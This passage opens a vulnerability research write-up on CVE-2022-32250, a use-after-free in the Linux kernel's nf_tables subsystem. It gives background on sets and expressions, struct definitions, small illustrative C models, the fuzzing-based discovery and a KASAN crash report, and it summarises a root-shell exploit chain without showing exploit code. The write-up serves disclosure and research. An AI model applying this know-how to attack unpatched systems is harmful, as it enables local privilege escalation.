- Introduction

- netlink and nf_tables Overview

- Vulnerability Discovery

- CVE-2022-32250 Analysis

- Exploitation



- Patch Analysis

- Conclusions

- Exploit Glossary

- Disclosure Timeline

- Extra Reading





The final exploit in action:

Introduction

The Exploit Development Group (EDG) at NCC Group planned to compete in the Pwn2Own Desktop 2022 competition, specifically targeting the Ubuntu kernel. This went well at first: we found several vulnerabilities early on. Our problems began when the first vulnerability we found and exploited was publicly disclosed by someone else and patched as CVE-2022-0185.

This meant we had to look for a new vulnerability as a replacement. Not long after finding a new bug and working through a bunch of exploitation tasks (such as bypassing KASLR), this second bug was also publicly disclosed and fixed as CVE-2022-0995.

We finally started working on a third vulnerability, but unfortunately we didn’t have enough time to make the exploit stable enough to feel confident competing at Pwn2Own before the deadline. There was also a last-minute update of Ubuntu from 21.10 to 22.04, which changed the kernel point release. As a result, some of the slab objects that we were originally using for exploitation no longer worked on the latest Ubuntu, and developing a working exploit took more time.

After missing the competition deadline, we decided to disclose the vulnerability once we had successfully exploited it. It was assigned CVE-2022-32250. This write-up describes the vulnerability and the process we used to exploit it. Our final exploit targets the latest Ubuntu (22.04) and the Linux kernel 5.15.

We will show that a quite limited use-after-free vulnerability affecting the netlink subsystem can be exploited twice to open up other more powerful use-after-free primitives. By triggering four use-after-free conditions in total, we are able to bypass KASLR and kick off a ROP gadget that allows us to overwrite modprobe_path and spawn an elevated shell as root. You would think that triggering four use-after-frees would lead to a less reliable exploit. However, we will demonstrate how we significantly improved its reliability to build a very stable exploit.

netlink and nf_tables Overview

In April 2022, David Bouman wrote a fantastic article about a separate vulnerability in nf_tables. In this article, he goes into great detail about how nf_tables works and also provides an open source helper library with some good APIs for interacting with nf_tables functionality in a more pleasant way, so we highly recommend checking it out.

At the very least, please check out sections “2. Introduction to netfilter” and “3. Introduction to nf_tables” from his paper, as it will provide a more in depth background into a lot of the functionality we will be interacting with.

Instead of repeating what David already wrote, we will only focus on adding relevant details for our vulnerability that aren’t covered in his article.

Sets

nf_tables has the concept of sets. These effectively allow you to create anonymous or named lists of key/value pairs. An anonymous set must be associated with a rule, but a named set can be created independently and referenced later. A set does however still need to be associated with an existing table and chain.

Sets are represented internally by the nft_set structure.

    // https://elixir.bootlin.com/linux/v5.13/source/include/net/netfilter/nf_tables.h#L440
    /**
     * struct nft_set - nf_tables set instance
     *
     * @list: table set list node
     * @bindings: list of set bindings
     * @table: table this set belongs to
     * @net: netnamespace this set belongs to
     * @name: name of the set
     * @handle: unique handle of the set
     * @ktype: key type (numeric type defined by userspace, not used in the kernel)
     * @dtype: data type (verdict or numeric type defined by userspace)
     * @objtype: object type (see NFT_OBJECT_* definitions)
     * @size: maximum set size
     * @field_len: length of each field in concatenation, bytes
     * @field_count: number of concatenated fields in element
     * @use: number of rules references to this set
     * @nelems: number of elements
     * @ndeact: number of deactivated elements queued for removal
     * @timeout: default timeout value in jiffies
     * @gc_int: garbage collection interval in msecs
     * @policy: set parameterization (see enum nft_set_policies)
     * @udlen: user data length
     * @udata: user data
     * @expr: stateful expression
     * @ops: set ops
     * @flags: set flags
     * @genmask: generation mask
     * @klen: key length
     * @dlen: data length
     * @data: private set data
     */
    struct nft_set {
        struct list_head        list;
        struct list_head        bindings;
        struct nft_table        *table;
        possible_net_t          net;
        char                    *name;
        u64                     handle;
        u32                     ktype;
        u32                     dtype;
        u32                     objtype;
        u32                     size;
        u8                      field_len[NFT_REG32_COUNT];
        u8                      field_count;
        u32                     use;
        atomic_t                nelems;
        u32                     ndeact;
        u64                     timeout;
        u32                     gc_int;
        u16                     policy;
        u16                     udlen;
        unsigned char           *udata;
        /* runtime data below here */
        const struct nft_set_ops *ops ____cacheline_aligned;
        u16                     flags:14,
                                genmask:2;
        u8                      klen;
        u8                      dlen;
        u8                      num_exprs;
        struct nft_expr         *exprs[NFT_SET_EXPR_MAX];
        struct list_head        catchall_list;
        unsigned char           data[]
            __attribute__((aligned(__alignof__(u64))));
    };

There are quite a few interesting fields in this structure that we will end up working with. We will summarize a few of them here:

- list: A doubly linked list of nft_set structures associated with the same table

- bindings: A doubly linked list of expressions that are bound to this set, effectively meaning there is a rule that is referencing this set

- name: The name of the set which is used to look it up when triggering certain functionality. The name is often required, although there are some APIs that will use the handle identifier instead

- use: Counter that will get incremented when there are expressions bound to the set

- nelems: Number of elements

- ndeact: Number of deactivated elements

- udlen: The length of user supplied data stored in the set’s data array

- udata: A pointer into the set’s data array, which points to the beginning of user supplied data

- ops: A function table pointer

A set can be created with or without user data being specified. If no user data is supplied when allocating a set, it will be placed on the kmalloc-512 slab. If even a little bit of data is supplied, it will push the allocation size over 512 bytes and the set will be allocated onto kmalloc-1k.
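To make the slab arithmetic concrete, here is a minimal userspace sketch of how a request size maps to a general-purpose kmalloc cache. The bucket list reflects the usual x86-64 cache sizes. `SET_BASE_SIZE_ASSUMED` is a hypothetical placeholder chosen only to match the behavior described above; it is not a measured `sizeof` from any kernel build.

```c
#include <stddef.h>

/*
 * Return the size of the general-purpose kmalloc cache that would serve a
 * request of `size` bytes, or 0 if the request exceeds the largest bucket
 * modelled here.
 */
size_t kmalloc_bucket(size_t size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++) {
        if (size <= buckets[i])
            return buckets[i];
    }
    return 0;
}

/*
 * ASSUMPTION: allocation size of a set with no user data. Hypothetical value
 * picked so that zero bytes of user data still fits in kmalloc-512.
 */
#define SET_BASE_SIZE_ASSUMED 512

/* Bucket used for a set carrying `udlen` bytes of user data (model only). */
size_t set_bucket(size_t udlen)
{
    return kmalloc_bucket(SET_BASE_SIZE_ASSUMED + udlen);
}
```

Under that assumption, `set_bucket(0)` selects the 512-byte cache while `set_bucket(1)` already spills into the 1024-byte cache.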

Taking a closer look at the ops member we see:

    /**
     * struct nft_set_ops - nf_tables set operations
     *
     * @lookup: look up an element within the set
     * @update: update an element if exists, add it if doesn't exist
     * ...
     *
     * Operations lookup, update and delete have simpler interfaces, are faster
     * and currently only used in the packet path. All the rest are slower,
     * control plane functions.
     */
    struct nft_set_ops {
        bool (*lookup)(const struct net *net,
                       const struct nft_set *set,
                       const u32 *key,
                       const struct nft_set_ext **ext);
        bool (*update)(struct nft_set *set,
                       const u32 *key,
                       void *(*new)(struct nft_set *,
                                    const struct nft_expr *,
                                    struct nft_regs *),
                       const struct nft_expr *expr,
                       struct nft_regs *regs,
                       const struct nft_set_ext **ext);
        ...
    };

We will elaborate on how we use or abuse these structure members in more detail as we run into them.
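For readers less familiar with this pattern, the following is a simplified userspace sketch of an ops function table. All `toy_*` names are hypothetical and only loosely mirror the shape of nft_set and nft_set_ops. The point is that every operation is an indirect call through the `ops` pointer stored in the object.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct toy_set;

/* Function table: one pointer per operation a set backend implements. */
struct toy_set_ops {
    bool (*lookup)(const struct toy_set *set, uint32_t key);
};

struct toy_set {
    const struct toy_set_ops *ops; /* selects the backend implementation */
    uint32_t keys[4];
    size_t nkeys;
};

/* A trivial array-backed lookup implementation. */
static bool toy_array_lookup(const struct toy_set *set, uint32_t key)
{
    for (size_t i = 0; i < set->nkeys; i++) {
        if (set->keys[i] == key)
            return true;
    }
    return false;
}

const struct toy_set_ops toy_array_ops = {
    .lookup = toy_array_lookup,
};

/* Callers never name the backend; they dispatch through set->ops. */
bool toy_set_contains(const struct toy_set *set, uint32_t key)
{
    return set->ops->lookup(set, key);
}
```

Because the call target is read from memory at run time, whoever controls the `ops` pointer of such an object controls where the indirect call lands.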

Expressions

Expressions are effectively the discrete pieces of logic associated with a rule. They let you extract information from network traffic for analysis, modify properties of a set or map value, and so on.

When an expression type is defined by a module in the kernel (e.g. net/netfilter/nft_immediate.c), there is an associated nft_expr_type structure that specifies the name, the associated ops function table, flags, etc.

    /**
     * struct nft_expr_type - nf_tables expression type
     *
     * @select_ops: function to select nft_expr_ops
     * @release_ops: release nft_expr_ops
     * @ops: default ops, used when no select_ops functions is present
     * @list: used internally
     * @name: Identifier
     * @owner: module reference
     * @policy: netlink attribute policy
     * @maxattr: highest netlink attribute number
     * @family: address family for AF-specific types
     * @flags: expression type flags
     */
    struct nft_expr_type {
        const struct nft_expr_ops *(*select_ops)(const struct nft_ctx *,
                                                 const struct nlattr * const tb[]);
        void                      (*release_ops)(const struct nft_expr_ops *ops);
        const struct nft_expr_ops *ops;
        struct list_head          list;
        const char                *name;
        struct module             *owner;
        const struct nla_policy   *policy;
        unsigned int              maxattr;
        u8                        family;
        u8                        flags;
    };

At the time of writing there are only two expression type flag values: stateful (NFT_EXPR_STATEFUL) and garbage collectible (NFT_EXPR_GC).

Set Expressions

When creating a set, it is possible to associate a small number of expressions with the set itself. The main example used in the documentation is a counter expression (net/netfilter/nft_counter.c). If there is a set of ports associated with a rule, then the counter expression will tell nf_tables to count the number of times the rule hits and increment the associated values in the set.

A maximum of two expressions can be associated with a set. There are a myriad of available expressions in nf_tables. For the purposes of this paper, we are interested in only a few. It is worth noting that only those known as stateful expressions are meant to be associated with a set. Those that are not stateful will eventually be rejected.

When an expression is associated with a set, it will be bound to the set on the list called set->bindings. The set->use counter will also be incremented which prevents the set from being destroyed until the associated expressions are destroyed and removed from the list.
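The bookkeeping described above can be modelled in userspace as follows. This is a minimal sketch, not kernel code: the `model_*` names are hypothetical, the list helpers are simplified re-implementations of the kernel’s circular doubly linked list, and returning -EBUSY for a set that is still in use is this model’s choice.

```c
#include <errno.h>
#include <stddef.h>

/* Minimal circular doubly linked list, in the style of the kernel's list_head. */
struct list_head { struct list_head *next, *prev; };

static void list_init(struct list_head *h)
{
    h->next = h;
    h->prev = h;
}

static void list_add_tail(struct list_head *n, struct list_head *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

static void list_del(struct list_head *n)
{
    n->prev->next = n->next;
    n->next->prev = n->prev;
    n->next = NULL;
    n->prev = NULL;
}

struct model_set {
    struct list_head bindings; /* expressions bound to this set */
    unsigned int use;          /* reference count held by bound expressions */
};

struct model_binding { struct list_head list; };

void model_set_init(struct model_set *s)
{
    list_init(&s->bindings);
    s->use = 0;
}

/* Binding links the expression into set->bindings and takes a reference. */
void model_bind(struct model_set *s, struct model_binding *b)
{
    list_add_tail(&b->list, &s->bindings);
    s->use++;
}

/* Unbinding must undo both steps before the expression memory is released. */
void model_unbind(struct model_set *s, struct model_binding *b)
{
    list_del(&b->list);
    s->use--;
}

/* A set that is still referenced cannot be destroyed. */
int model_set_destroy(const struct model_set *s)
{
    return s->use > 0 ? -EBUSY : 0;
}
```

Note that the list node lives inside the expression’s own memory, so the list is only consistent as long as every bound expression is unlinked before it is freed.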

Stateful Expressions

The high-level documentation details stateful objects. They are associated with things like rules and sets to track the state of the rules. Internally, these stateful objects are actually created through the use of different expression types. There are a fairly limited number of these types of stateful expressions, but they include things like counters, connection limits, etc.

Expressions of Interest

nft_lookup

Module: net/netfilter/nft_lookup.c

In the documentation, the lookup expression is described as “search for data from a given register (key) into a dataset. If the set is a map/vmap, returns the value for that key.”. When using this expression, you provide a set identifier, and specify a key into the associated map.

This expression is interesting to us because, as we will see in more detail later, the allocated expression object becomes “bound” to the set that is looked up.

These expressions are stored on the kmalloc-48 slab cache.

nft_dynset

Module: net/netfilter/nft_dynset.c

The dynamic set expression is designed to allow for more complex expressions to be associated with specific set values. It allows you to read and write values from a set, rather than something more basic like a counter or connection limit.

Similarly to nft_lookup, this expression is interesting to us because it is “bound” to the set that is looked up during expression initialization.

These expressions are stored on the kmalloc-96 slab cache.

nft_connlimit

Module: net/netfilter/nft_connlimit.c

The connection limit is a stateful expression. Its purpose is to limit the number of connections per IP address. This is a legitimate expression that could be associated with a set during creation, where the set may contain the list of IP addresses to enforce the limit on.

This expression is interesting for two reasons:

- It is an example of an expression marked with the NFT_EXPR_STATEFUL flag, which is what allows it to be legitimately embedded in a set during creation.

- It is also marked with the NFT_EXPR_GC flag, which means it can be used to access specific function pointers related to garbage collection that are not exposed by most expressions.

    static struct nft_expr_type nft_connlimit_type __read_mostly = {
        .name    = "connlimit",
        .ops     = &nft_connlimit_ops,
        .policy  = nft_connlimit_policy,
        .maxattr = NFTA_CONNLIMIT_MAX,
        .flags   = NFT_EXPR_STATEFUL | NFT_EXPR_GC,
        .owner   = THIS_MODULE,
    };

Vulnerability Discovery

We did a combination of fuzzing with syzkaller and manual code review, but the majority of vulnerabilities were found via fuzzing. Although we used private grammars to improve code coverage of areas we wanted to target, some of the bugs were triggerable by the public grammars.

One important part of our fuzzing approach in this case was limiting the fuzzer to netfilter-based code. Looking at the netfilter code and previously identified bugs, we determined that the complexity of the code warranted more dedicated fuzzing compute power focused on this area.

In the case of this bug, the fuzzer found the vulnerability but was unable to generate a reproduction (repro) program. Typically, this makes analyzing the vulnerability much harder. However, this seemed promising: it implied that other people fuzzing the same code might pass over this particular bug because it is harder to triage. After having two bugs burnt, we were keen on something less likely to be found by others, and we needed a fast replacement in time for the contest. From an initial look at the crash, a use-after-free (UAF) write looked worthy of investigation.

The following is the KASAN report we saw. We decided to manually triage it. We constructed a minimal reproducible trigger and provided it in the initial public report, which can be found at the end of our original advisory here.

[ 85.431824] ================================================================== [ 85.432901] BUG: KASAN: use-after-free in nf_tables_bind_set+0x81b/0xa20 [ 85.433825] Write of size 8 at addr ffff8880286f0e98 by task poc/776 [ 85.434756] [ 85.434999] CPU: 1 PID: 776 Comm: poc Tainted: G W 5.18.0+ #2 [ 85.436023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 [ 85.437228] Call Trace: [ 85.437594] [ 85.437919] dump_stack_lvl+0x49/0x5f [ 85.438470] print_report.cold+0x5e/0x5cf [ 85.439073] ? __cpuidle_text_end+0x4/0x4 [ 85.439655] ? nf_tables_bind_set+0x81b/0xa20 [ 85.440286] kasan_report+0xaa/0x120 [ 85.440809] ? delay_halt_mwaitx+0x31/0x50 [ 85.441392] ? nf_tables_bind_set+0x81b/0xa20 [ 85.442022] __asan_report_store8_noabort+0x17/0x20 [ 85.442725] nf_tables_bind_set+0x81b/0xa20 [ 85.443338] ? nft_set_elem_expr_destroy+0x2a0/0x2a0 [ 85.444051] ? nla_strcmp+0xa8/0xe0 [ 85.444520] ? nft_set_lookup_global+0x88/0x360 [ 85.445157] nft_lookup_init+0x463/0x620 [ 85.445710] nft_expr_init+0x13a/0x2a0 [ 85.446242] ? nft_obj_del+0x210/0x210 [ 85.446778] ? __kasan_check_write+0x14/0x20 [ 85.447395] ? rhashtable_init+0x326/0x6d0 [ 85.447974] ? __rcu_read_unlock+0xde/0x100 [ 85.448565] ? nft_rhash_init+0x213/0x2f0 [ 85.449129] ? nft_rhash_gc_init+0xb0/0xb0 [ 85.449717] ? nf_tables_newset+0x1646/0x2e40 [ 85.450359] ? jhash+0x630/0x630 [ 85.450838] nft_set_elem_expr_alloc+0x24/0x210 [ 85.451507] nf_tables_newset+0x1b3f/0x2e40 [ 85.452124] ? rcu_preempt_deferred_qs_irqrestore+0x579/0xa70 [ 85.452948] ? nft_set_elem_expr_alloc+0x210/0x210 [ 85.453636] ? delay_tsc+0x94/0xc0 [ 85.454161] nfnetlink_rcv_batch+0xeb4/0x1fd0 [ 85.454808] ? nfnetlink_rcv_msg+0x980/0x980 [ 85.455444] ? stack_trace_save+0x94/0xc0 [ 85.456036] ? filter_irq_stacks+0x90/0x90 [ 85.456639] ? __const_udelay+0x62/0x80 [ 85.457206] ? _raw_spin_lock_irqsave+0x99/0xf0 [ 85.457864] ? nla_get_range_signed+0x350/0x350 [ 85.458528] ? 
security_capable+0x5f/0xa0 [ 85.459128] nfnetlink_rcv+0x2f0/0x3b0 [ 85.459669] ? nfnetlink_rcv_batch+0x1fd0/0x1fd0 [ 85.460327] ? rcu_read_unlock_special+0x52/0x3b0 [ 85.461000] netlink_unicast+0x5ec/0x890 [ 85.461563] ? netlink_attachskb+0x750/0x750 [ 85.462169] ? __kasan_check_read+0x11/0x20 [ 85.462766] ? __check_object_size+0x226/0x3a0 [ 85.463408] netlink_sendmsg+0x830/0xd10 [ 85.463968] ? netlink_unicast+0x890/0x890 [ 85.464552] ? apparmor_socket_sendmsg+0x3d/0x50 [ 85.465206] ? netlink_unicast+0x890/0x890 [ 85.465792] sock_sendmsg+0xec/0x120 [ 85.466303] __sys_sendto+0x1e2/0x2e0 [ 85.466821] ? __ia32_sys_getpeername+0xb0/0xb0 [ 85.467470] ? alloc_file_pseudo+0x184/0x270 [ 85.468070] ? perf_callchain_user+0x60/0xa60 [ 85.468683] ? preempt_count_add+0x7f/0x170 [ 85.469280] ? fd_install+0x14f/0x330 [ 85.469800] ? __sys_socket+0x166/0x200 [ 85.470342] ? __sys_socket_file+0x1c0/0x1c0 [ 85.470940] ? debug_smp_processor_id+0x17/0x20 [ 85.471583] ? fpregs_assert_state_consistent+0x4e/0xb0 [ 85.472308] __x64_sys_sendto+0xe0/0x1a0 [ 85.472854] ? do_syscall_64+0x69/0x80 [ 85.473379] do_syscall_64+0x5c/0x80 [ 85.473878] ? fpregs_restore_userregs+0xf3/0x200 [ 85.474532] ? switch_fpu_return+0xe/0x10 [ 85.475099] ? exit_to_user_mode_prepare+0x140/0x170 [ 85.475791] ? irqentry_exit_to_user_mode+0x9/0x20 [ 85.476465] ? irqentry_exit+0x33/0x40 [ 85.476991] ? 
exc_page_fault+0x72/0xe0 [ 85.477524] entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 85.478219] RIP: 0033:0x45c66a [ 85.478648] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89 [ 85.481183] RSP: 002b:00007ffd091bfee8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c [ 85.482214] RAX: ffffffffffffffda RBX: 0000000000000174 RCX: 000000000045c66a [ 85.483190] RDX: 0000000000000174 RSI: 00007ffd091bfef0 RDI: 0000000000000003 [ 85.484162] RBP: 00007ffd091c23b0 R08: 00000000004a94c8 R09: 000000000000000c [ 85.485128] R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd091c1ef0 [ 85.486094] R13: 0000000000000004 R14: 0000000000002000 R15: 0000000000000000 [ 85.487076] [ 85.487388] [ 85.487608] Allocated by task 776: [ 85.488082] kasan_save_stack+0x26/0x50 [ 85.488614] __kasan_kmalloc+0x88/0xa0 [ 85.489131] __kmalloc+0x1b9/0x370 [ 85.489602] nft_expr_init+0xcd/0x2a0 [ 85.490109] nft_set_elem_expr_alloc+0x24/0x210 [ 85.490731] nf_tables_newset+0x1b3f/0x2e40 [ 85.491314] nfnetlink_rcv_batch+0xeb4/0x1fd0 [ 85.491912] nfnetlink_rcv+0x2f0/0x3b0 [ 85.492429] netlink_unicast+0x5ec/0x890 [ 85.492985] netlink_sendmsg+0x830/0xd10 [ 85.493528] sock_sendmsg+0xec/0x120 [ 85.494035] __sys_sendto+0x1e2/0x2e0 [ 85.494545] __x64_sys_sendto+0xe0/0x1a0 [ 85.495109] do_syscall_64+0x5c/0x80 [ 85.495630] entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 85.496292] [ 85.496479] Freed by task 776: [ 85.496846] kasan_save_stack+0x26/0x50 [ 85.497351] kasan_set_track+0x25/0x30 [ 85.497893] kasan_set_free_info+0x24/0x40 [ 85.498489] __kasan_slab_free+0x110/0x170 [ 85.499103] kfree+0xa7/0x310 [ 85.499548] nft_set_elem_expr_alloc+0x1b3/0x210 [ 85.500219] nf_tables_newset+0x1b3f/0x2e40 [ 85.500822] nfnetlink_rcv_batch+0xeb4/0x1fd0 [ 85.501449] nfnetlink_rcv+0x2f0/0x3b0 [ 85.501990] netlink_unicast+0x5ec/0x890 [ 85.502558] netlink_sendmsg+0x830/0xd10 [ 85.503133] 
sock_sendmsg+0xec/0x120 [ 85.503655] __sys_sendto+0x1e2/0x2e0 [ 85.504194] __x64_sys_sendto+0xe0/0x1a0 [ 85.504779] do_syscall_64+0x5c/0x80 [ 85.505330] entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 85.506095] [ 85.506325] The buggy address belongs to the object at ffff8880286f0e80 [ 85.506325] which belongs to the cache kmalloc-cg-64 of size 64 [ 85.508152] The buggy address is located 24 bytes inside of [ 85.508152] 64-byte region [ffff8880286f0e80, ffff8880286f0ec0) [ 85.509845] [ 85.510095] The buggy address belongs to the physical page: [ 85.510962] page:000000008955c452 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff8880286f0080 pfn:0x286f0 [ 85.512566] memcg:ffff888054617c01 [ 85.513079] flags: 0xffe00000000200(slab|node=0|zone=1|lastcpupid=0x3ff) [ 85.514070] raw: 00ffe00000000200 0000000000000000 dead000000000122 ffff88801b842780 [ 85.515251] raw: ffff8880286f0080 000000008020001d 00000001ffffffff ffff888054617c01 [ 85.516421] page dumped because: kasan: bad access detected [ 85.517264] [ 85.517505] Memory state around the buggy address: [ 85.518231] ffff8880286f0d80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 85.519321] ffff8880286f0e00: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc [ 85.520392] >ffff8880286f0e80: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc [ 85.521456] ^ [ 85.522050] ffff8880286f0f00: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc [ 85.523125] ffff8880286f0f80: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc [ 85.524200] ================================================================== [ 85.525364] Disabling lock debugging due to kernel taint [ 85.534106] ------------[ cut here ]------------ [ 85.534874] WARNING: CPU: 1 PID: 776 at net/netfilter/nf_tables_api.c:4592 nft_set_destroy+0x343/0x460 [ 85.536269] Modules linked in: [ 85.536741] CPU: 1 PID: 776 Comm: poc Tainted: G B W 5.18.0+ #2 [ 85.537792] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 [ 85.539080] RIP: 
0010:nft_set_destroy+0x343/0x460 [ 85.539774] Code: 3c 02 00 0f 85 26 01 00 00 49 8b 7c 24 30 e8 94 f0 ee f1 4c 89 e7 e8 ec b0 da f1 48 83 c4 30 5b 41 5c 41 5d 41 5e 41 5f 5d c3 <0f> 0b 48 83 c4 30 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 8b 7d b0 e8 [ 85.542475] RSP: 0018:ffff88805911f4f8 EFLAGS: 00010202 [ 85.543282] RAX: 0000000000000002 RBX: dead000000000122 RCX: ffff88805911f508 [ 85.544291] RDX: 0000000000000000 RSI: ffff888052ab1800 RDI: ffff888052ab1864 [ 85.545331] RBP: ffff88805911f550 R08: ffff8880286ce908 R09: 0000000000000000 [ 85.546371] R10: ffffed100b223e56 R11: 0000000000000001 R12: ffff888052ab1800 [ 85.547447] R13: ffff8880286ce900 R14: dffffc0000000000 R15: ffff8880286ce780 [ 85.548487] FS: 00000000018293c0(0000) GS:ffff88806a900000(0000) knlGS:0000000000000000 [ 85.549630] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 85.550470] CR2: 00007ffd091bfee8 CR3: 0000000052156000 CR4: 00000000000006e0 [ 85.551551] Call Trace: [ 85.551930] [ 85.552245] ? rcu_read_unlock_special+0x52/0x3b0 [ 85.552971] __nf_tables_abort+0xd40/0x2f10 [ 85.553612] ? __udelay+0x15/0x20 [ 85.554133] ? __nft_release_basechain+0x5a0/0x5a0 [ 85.554878] ? rcu_read_unlock_special+0x52/0x3b0 [ 85.555592] nf_tables_abort+0x77/0xa0 [ 85.556153] nfnetlink_rcv_batch+0xb23/0x1fd0 [ 85.556820] ? nfnetlink_rcv_msg+0x980/0x980 [ 85.557467] ? stack_trace_save+0x94/0xc0 [ 85.558065] ? filter_irq_stacks+0x90/0x90 [ 85.558682] ? __const_udelay+0x62/0x80 [ 85.559321] ? _raw_spin_lock_irqsave+0x99/0xf0 [ 85.559997] ? nla_get_range_signed+0x350/0x350 [ 85.560683] ? security_capable+0x5f/0xa0 [ 85.561307] nfnetlink_rcv+0x2f0/0x3b0 [ 85.561863] ? nfnetlink_rcv_batch+0x1fd0/0x1fd0 [ 85.562555] ? rcu_read_unlock_special+0x52/0x3b0 [ 85.563303] netlink_unicast+0x5ec/0x890 [ 85.563896] ? netlink_attachskb+0x750/0x750 [ 85.564546] ? __kasan_check_read+0x11/0x20 [ 85.565165] ? __check_object_size+0x226/0x3a0 [ 85.565838] netlink_sendmsg+0x830/0xd10 [ 85.566407] ? 
netlink_unicast+0x890/0x890 [ 85.567044] ? apparmor_socket_sendmsg+0x3d/0x50 [ 85.567724] ? netlink_unicast+0x890/0x890 [ 85.568334] sock_sendmsg+0xec/0x120 [ 85.568874] __sys_sendto+0x1e2/0x2e0 [ 85.569417] ? __ia32_sys_getpeername+0xb0/0xb0 [ 85.570086] ? alloc_file_pseudo+0x184/0x270 [ 85.570757] ? perf_callchain_user+0x60/0xa60 [ 85.571431] ? preempt_count_add+0x7f/0x170 [ 85.572054] ? fd_install+0x14f/0x330 [ 85.572612] ? __sys_socket+0x166/0x200 [ 85.573190] ? __sys_socket_file+0x1c0/0x1c0 [ 85.573805] ? debug_smp_processor_id+0x17/0x20 [ 85.574452] ? fpregs_assert_state_consistent+0x4e/0xb0 [ 85.575242] __x64_sys_sendto+0xe0/0x1a0 [ 85.575804] ? do_syscall_64+0x69/0x80 [ 85.576367] do_syscall_64+0x5c/0x80 [ 85.576901] ? fpregs_restore_userregs+0xf3/0x200 [ 85.577591] ? switch_fpu_return+0xe/0x10 [ 85.578179] ? exit_to_user_mode_prepare+0x140/0x170 [ 85.578947] ? irqentry_exit_to_user_mode+0x9/0x20 [ 85.579676] ? irqentry_exit+0x33/0x40 [ 85.580245] ? exc_page_fault+0x72/0xe0 [ 85.580824] entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 85.581577] RIP: 0033:0x45c66a [ 85.582059] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89 [ 85.584728] RSP: 002b:00007ffd091bfee8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c [ 85.585784] RAX: ffffffffffffffda RBX: 0000000000000174 RCX: 000000000045c66a [ 85.586821] RDX: 0000000000000174 RSI: 00007ffd091bfef0 RDI: 0000000000000003 [ 85.587835] RBP: 00007ffd091c23b0 R08: 00000000004a94c8 R09: 000000000000000c [ 85.588832] R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd091c1ef0 [ 85.589820] R13: 0000000000000004 R14: 0000000000002000 R15: 0000000000000000 [ 85.590899] [ 85.591243] ---[ end trace 0000000000000000 ]---

A few simplified points to note from the dump:

We see the UAF happens when an expression is being bound to a set. It seems to be initializing a “lookup” expression specifically, which seems to perhaps be an expression specific to this set.

    nf_tables_bind_set+0x81b/0xa20
    nft_lookup_init+0x463/0x620
    nft_expr_init+0x13a/0x2a0
    nft_set_elem_expr_alloc+0x24/0x210
    nf_tables_newset+0x1b3f/0x2e40

The object being used after free was allocated when constructing a new set:

    nft_expr_init+0xcd/0x2a0
    nft_set_elem_expr_alloc+0x24/0x210
    nf_tables_newset+0x1b3f/0x2e40

It’s interesting to note that the code path used for the allocation seems very similar to where the UAF is occurring.

And finally, when the free occurred:

    kfree+0xa7/0x310
    nft_set_elem_expr_alloc+0x1b3/0x210
    nf_tables_newset+0x1b3f/0x2e40

The free also occurs in close proximity to where the use-after-free happens.

As an additional point of interest, @dvyukov noticed on Twitter, after we had made the vulnerability report public, that this issue had been found by syzbot in November 2021. Perhaps because no reproducer was created and there was little activity, it was never investigated or properly triaged, and it was eventually closed automatically as invalid.
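When triaging by hand, it can help to compare frames from the use, allocation and free stacks mechanically. The sketch below parses one frame of the form `symbol+0xOFFSET/0xSIZE`, as seen in the report above, and checks whether two frames fall in the same function. The `trace_frame`, `parse_frame` and `same_function` names are our own illustration, not part of any kernel or KASAN tooling.

```c
#include <stdio.h>
#include <string.h>

struct trace_frame {
    char symbol[64];      /* function name */
    unsigned long offset; /* offset of the return address inside the function */
    unsigned long size;   /* total size of the function */
};

/*
 * Parse a frame such as "nf_tables_bind_set+0x81b/0xa20".
 * Returns 0 on success, -1 if the text does not have that shape.
 */
int parse_frame(const char *text, struct trace_frame *out)
{
    /* Skip leading blanks and the "?" marker used for unreliable frames. */
    while (*text == ' ' || *text == '?')
        text++;

    if (sscanf(text, "%63[^+ ]+%lx/%lx",
               out->symbol, &out->offset, &out->size) != 3)
        return -1;
    return 0;
}

/* Two frames are in the same function if their symbol names match. */
int same_function(const struct trace_frame *a, const struct trace_frame *b)
{
    return strcmp(a->symbol, b->symbol) == 0;
}
```

Applied to the excerpts above, the allocation frame `nft_set_elem_expr_alloc+0x24/0x210` and the free frame `nft_set_elem_expr_alloc+0x1b3/0x210` resolve to the same function at different offsets, which is what makes the allocation and free paths look so closely related.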

CVE-2022-32250 Analysis

With a bit of background on netlink and nf_tables out of the way we can take a look at the vulnerability and try to understand what is happening. Our vulnerability is related to the handling of expressions that are bound to a set. If you already read the original bug report, then you may be able to skip this part (as much of the content is duplicated) and jump straight into the “Exploitation” section.

Set Creation

